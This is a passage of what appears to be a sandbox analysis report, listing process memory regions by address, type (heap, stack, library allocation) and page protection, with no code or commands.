page read and write
|
||
|
24393016000
|
trusted library allocation
|
page read and write
|
||
|
2964963000
|
stack
|
page read and write
|
||
|
21918160000
|
trusted library allocation
|
page read and write
|
||
|
341ABFE000
|
unkown
|
page readonly
|
||
|
156B3072000
|
trusted library allocation
|
page read and write
|
||
|
243AA0D0000
|
heap
|
page read and write
|
||
|
21918048000
|
trusted library allocation
|
page read and write
|
||
|
886027E000
|
stack
|
page read and write
|
||
|
156B2F55000
|
trusted library allocation
|
page read and write
|
||
|
21919000000
|
heap
|
page read and write
|
||
|
156B340C000
|
trusted library allocation
|
page read and write
|
||
|
156CB41C000
|
heap
|
page read and write
|
||
|
7FFE18790000
|
trusted library allocation
|
page read and write
|
||
|
252ED89F000
|
heap
|
page read and write
|
||
|
7FFE16696000
|
trusted library allocation
|
page execute and read and write
|
||
|
243AA223000
|
heap
|
page read and write
|
||
|
252ED664000
|
heap
|
page read and write
|
||
|
2438FF59000
|
heap
|
page read and write
|
||
|
21912D17000
|
heap
|
page read and write
|
||
|
156B1566000
|
heap
|
page execute and read and write
|
||
|
7FFE168A0000
|
trusted library allocation
|
page read and write
|
||
|
21913F50000
|
trusted library allocation
|
page read and write
|
||
|
CBE277D000
|
stack
|
page read and write
|
||
|
24391950000
|
heap
|
page readonly
|
||
|
25E45930000
|
heap
|
page read and write
|
||
|
7FFE188A0000
|
trusted library allocation
|
page read and write
|
||
|
CBE2A3F000
|
stack
|
page read and write
|
||
|
7FFE167A0000
|
trusted library allocation
|
page read and write
|
||
|
2438FFAF000
|
heap
|
page read and write
|
||
|
25290010000
|
trusted library allocation
|
page read and write
|
||
|
25280001000
|
trusted library allocation
|
page read and write
|
||
|
2965138000
|
stack
|
page read and write
|
||
|
21912D06000
|
heap
|
page read and write
|
||
|
156B370C000
|
trusted library allocation
|
page read and write
|
||
|
7FFE18750000
|
trusted library allocation
|
page execute and read and write
|
||
|
885FC7E000
|
stack
|
page read and write
|
||
|
156CB3E7000
|
heap
|
page read and write
|
||
|
24391A10000
|
heap
|
page read and write
|
||
|
156B2F10000
|
heap
|
page read and write
|
||
|
7DF4AC700000
|
trusted library allocation
|
page execute and read and write
|
||
|
252ED7E0000
|
heap
|
page read and write
|
||
|
7FFE16800000
|
trusted library allocation
|
page read and write
|
||
|
29652BE000
|
stack
|
page read and write
|
||
|
24391940000
|
trusted library allocation
|
page read and write
|
||
|
2191824E000
|
heap
|
page read and write
|
||
|
7FFE16850000
|
trusted library allocation
|
page read and write
|
||
|
156B2EA0000
|
heap
|
page read and write
|
||
|
21912C73000
|
heap
|
page read and write
|
||
|
CBE283E000
|
stack
|
page read and write
|
||
|
7FFE18810000
|
trusted library allocation
|
page read and write
|
||
|
7FFE168C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE168A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16740000
|
trusted library allocation
|
page read and write
|
||
|
7FFE187F5000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16920000
|
trusted library allocation
|
page read and write
|
||
|
8860CCE000
|
stack
|
page read and write
|
||
|
2191822C000
|
heap
|
page read and write
|
||
|
7FFE16792000
|
trusted library allocation
|
page read and write
|
||
|
252ECD30000
|
heap
|
page read and write
|
||
|
219182FF000
|
heap
|
page read and write
|
||
|
252ED626000
|
heap
|
page read and write
|
||
|
7FFE16840000
|
trusted library allocation
|
page read and write
|
||
|
80F192F000
|
unkown
|
page read and write
|
||
|
252ED6A3000
|
heap
|
page read and write
|
||
|
2439264D000
|
trusted library allocation
|
page read and write
|
||
|
219182F0000
|
heap
|
page read and write
|
||
|
252901B1000
|
trusted library allocation
|
page read and write
|
||
|
252EB3FD000
|
heap
|
page read and write
|
||
|
7FFE168B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16751000
|
trusted library allocation
|
page read and write
|
||
|
7FFE1858D000
|
trusted library allocation
|
page execute and read and write
|
||
|
243A9F80000
|
heap
|
page execute and read and write
|
||
|
252ED7D7000
|
heap
|
page execute and read and write
|
||
|
7FFE16670000
|
trusted library allocation
|
page execute and read and write
|
||
|
CBE214F000
|
stack
|
page read and write
|
||
|
156B3032000
|
trusted library allocation
|
page read and write
|
||
|
7FFE18840000
|
trusted library allocation
|
page read and write
|
||
|
7FFE18870000
|
trusted library allocation
|
page read and write
|
||
|
7FFE18584000
|
trusted library allocation
|
page read and write
|
||
|
156C2F21000
|
trusted library allocation
|
page read and write
|
||
|
243A1A21000
|
trusted library allocation
|
page read and write
|
||
|
21912CB7000
|
heap
|
page read and write
|
||
|
7FFE18630000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16761000
|
trusted library allocation
|
page read and write
|
||
|
252ED5C8000
|
heap
|
page read and write
|
||
|
21912C95000
|
heap
|
page read and write
|
||
|
252ECFA0000
|
trusted library allocation
|
page read and write
|
||
|
21918241000
|
heap
|
page read and write
|
||
|
156C2F86000
|
trusted library allocation
|
page read and write
|
||
|
24391920000
|
trusted library allocation
|
page read and write
|
||
|
243AA072000
|
heap
|
page read and write
|
||
|
2964D7E000
|
stack
|
page read and write
|
||
|
2529007B000
|
trusted library allocation
|
page read and write
|
||
|
156B1300000
|
heap
|
page read and write
|
||
|
7FFE16750000
|
trusted library allocation
|
page read and write
|
||
|
7FFE188B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16930000
|
trusted library allocation
|
page read and write
|
||
|
156CB3BF000
|
heap
|
page read and write
|
||
|
156B2F3B000
|
trusted library allocation
|
page read and write
|
||
|
21918020000
|
trusted library allocation
|
page read and write
|
||
|
156CB459000
|
heap
|
page read and write
|
||
|
25281C2F000
|
trusted library allocation
|
page read and write
|
||
|
252EB270000
|
heap
|
page read and write
|
||
|
219180E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16870000
|
trusted library allocation
|
page read and write
|
||
|
1850C910000
|
heap
|
page read and write
|
||
|
2191335A000
|
heap
|
page read and write
|
||
|
2191828F000
|
heap
|
page read and write
|
||
|
7FFE165C0000
|
trusted library allocation
|
page read and write
|
||
|
2528051A000
|
trusted library allocation
|
page read and write
|
||
|
21912CA1000
|
heap
|
page read and write
|
||
|
80F18A9000
|
stack
|
page read and write
|
||
|
2507A790000
|
heap
|
page read and write
|
||
|
21913200000
|
heap
|
page read and write
|
||
|
885FBFD000
|
stack
|
page read and write
|
||
|
21912CB3000
|
heap
|
page read and write
|
||
|
7FFE1666C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2964E7F000
|
stack
|
page read and write
|
||
|
252EB580000
|
heap
|
page read and write
|
||
|
7FFE16810000
|
trusted library allocation
|
page read and write
|
||
|
243AA286000
|
heap
|
page read and write
|
||
|
7FFE167E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16870000
|
trusted library allocation
|
page read and write
|
||
|
252ED859000
|
heap
|
page read and write
|
||
|
21913313000
|
heap
|
page read and write
|
||
|
21912CB3000
|
heap
|
page read and write
|
||
|
7FFE18720000
|
trusted library allocation
|
page read and write
|
||
|
7FFE168D0000
|
trusted library allocation
|
page read and write
|
||
|
885FAFE000
|
stack
|
page read and write
|
||
|
29650B9000
|
stack
|
page read and write
|
||
|
7FFE18762000
|
trusted library allocation
|
page read and write
|
||
|
21918024000
|
trusted library allocation
|
page read and write
|
||
|
2507A3E0000
|
heap
|
page read and write
|
||
|
341C77E000
|
stack
|
page read and write
|
||
|
156B143E000
|
heap
|
page read and write
|
||
|
21912D29000
|
heap
|
page read and write
|
||
|
7FFE16810000
|
trusted library allocation
|
page read and write
|
||
|
885FA7D000
|
stack
|
page read and write
|
||
|
21912CA0000
|
heap
|
page read and write
|
||
|
156B2F21000
|
trusted library allocation
|
page read and write
|
||
|
CBE26FE000
|
stack
|
page read and write
|
||
|
7FFE16770000
|
trusted library allocation
|
page execute and read and write
|
||
|
156CB3BD000
|
heap
|
page read and write
|
||
|
7FFE167D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE165CB000
|
trusted library allocation
|
page read and write
|
||
|
243A1A31000
|
trusted library allocation
|
page read and write
|
||
|
7FFE18740000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE168E0000
|
trusted library allocation
|
page read and write
|
||
|
156CB574000
|
heap
|
page read and write
|
||
|
252ECF0A000
|
heap
|
page read and write
|
||
|
E5171EA000
|
stack
|
page read and write
|
||
|
21917FC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16830000
|
trusted library allocation
|
page read and write
|
||
|
21917FE1000
|
trusted library allocation
|
page read and write
|
||
|
7FFE18890000
|
trusted library allocation
|
page read and write
|
||
|
243AA204000
|
heap
|
page read and write
|
||
|
29651BE000
|
stack
|
page read and write
|
||
|
885FCFB000
|
stack
|
page read and write
|
||
|
156B3978000
|
trusted library allocation
|
page read and write
|
||
|
2507A589000
|
heap
|
page read and write
|
||
|
7FFE16880000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16880000
|
trusted library allocation
|
page read and write
|
||
|
243A1BD5000
|
trusted library allocation
|
page read and write
|
||
|
2438FF8F000
|
heap
|
page read and write
|
||
|
243AA1E0000
|
heap
|
page read and write
|
||
|
7FFE188F0000
|
trusted library allocation
|
page read and write
|
||
|
21918010000
|
trusted library allocation
|
page read and write
|
There are 571 hidden memdumps, click here to show them.